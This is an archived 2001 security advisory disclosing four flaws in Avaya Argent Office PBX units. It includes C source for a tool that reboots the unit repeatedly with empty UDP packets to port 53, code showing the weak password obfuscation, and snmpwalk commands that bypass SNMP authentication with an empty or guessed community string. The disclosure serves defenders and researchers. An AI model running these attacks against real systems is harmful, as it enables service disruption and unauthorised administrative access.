Multiple vulnerabilities in Avaya Argent Office

2001-08-13T00:00:00
ID SECURITYVULNS:DOC:1925
Type securityvulns
Reporter Securityvulns
Modified 2001-08-13T00:00:00

Description

Multiple vulnerabilities in Avaya Argent Office.

Systems affected: Avaya Argent Office Impact: local dos attack

The Argent branch of products (now known as Network Alchemy line) from Avaya are a solution integrating a PBX, network connectivity, dial on demand networking etc. I had some security concerns when i looked at it. Since all of them are only possible on a local network (and since this system is designed for small offices), they shouldn't be much of a problem.

  1. Local denial of service

By sending an udp packet to port 53 with no payload the Argent Office reboots. The unit gets up very quickly so one needs to send the packets repeatedly. Sample source code below:

/ argent_kill.c (c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl Reboots an Argent Office box by sending udp packets with no payload to port 53 usage: argent_kill ip_address /

include <stdio.h>

include <string.h>

include <netdb.h>

include <netinet/in.h>

include <sys/types.h>

include <sys/socket.h>

include <unistd.h>

main(int argc, char argv[]) { struct sockaddr_in addr; struct hostent host; int s;

s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if (s==-1) { perror("socket()"); exit(1); } host=gethostbyname(argv[1]); if (host==0) { herror("gethostbyname"); exit(1); } memcpy(&addr.sin_addr,host->h_addr,host->h_length); addr.sin_port=htons(53); addr.sin_family=AF_INET; if (connect(s,&addr,16)==-1) { perror("connect()"); exit(1); } for (;;) { send(s,0,0,0); sleep(1); printf("."); fflush(stdout); } close(s); }

  1. Easily decryptable configuration password

Configuring Argent Office consists of a strange tftp look-alike. For example to reboot a unit one must get via tftp the following file:

nasystem/rebootwhenfree/00e007002666/password//

Where 00e007002666 is the MAC address of the unit and password is the obfuscated password. Since this packet is easily sniffed and the obfuscation algorithm doesn't change, anyone with a sniffer can easily obtain administrative privliges. The obfuscation mechanism is rather simple, as the following example demonstrates:

/ argent_obfuscate.c (c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl demonstrates how the password obfuscation mechanism works in argent office products /

main(int argc,char **argv) { int i; unsigned char buf[32]; strcpy(&buf,argv[1]); for (i=0;i<strlen(argv[1]);i++) printf("0x%2.2X ",buf[i]+0x11-i); printf("\n"); }

Show the hex values for the password 'idiocy':

~$ ./argent_obfuscate idiocy 0x7A 0x74 0x78 0x7D 0x70 0x85

Writing a decryption routine is left as an excercise to the reader :)

  1. Dumb SNMP handling

This is a really good one! The software does snmp authentication via something similar to: if (strncmp(n,c,strlen(n))==0) { ok, valid community}

Where c is the community string and n is the community string from the network.

So basically if the size of the password in the packet is 0 then the authentication is ok :)

~$ snmpwalk 192.168.1.234 "" system.sysDescr.0 system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)

You could also guess the community string character by character.

guess the first letter: ~$ snmpwalk 192.168.1.234 a system.sysDescr.0 Timeout: No Response from 192.168.1.234 [the first letter is not a] [several combinations later, is it p?] ~$ snmpwalk 192.168.1.234 p system.sysDescr.0 system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)

[ok we have the first letter, lets go for the second] ~$ snmpwalk 192.168.1.234 pa system.sysDescr.0 Timeout: No Response from 192.168.1.234 [the second letter is not a] [several combinations later, is it r?] ~$ snmpwalk 192.168.1.234 pr system.sysDescr.0 system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)

etc... (the community is 'private')

While not much is gained by using snmp, the community may be some company standard, and knowing it may open other doors.

  1. Broadcast tftp requests

The system in it's default config requests a file called HoldMusic via tftp to the broadcast address. You could probably serve the file and change your company's music on hold tune to something more interesting :).

All these vulnerabilities can be excercised only from internal interfaces (i haven't found a way to kill it from the dialup interface), so the impact is usually minor (the local staff could lauch a much more destructive dos attack using a hammer), unless your network is public or has other entry points.

The standard disclaimer applies, if you do any damage, it's your problem, not mine (and neither is my employer).


Andra Sp. z o.o. Jacek Lipkowski sq5bpf@andra.com.pl ul. Wynalazek 6 Network Systems Specialist 02-677 Warsaw, Poland tel. (+4822)6404873 wew 250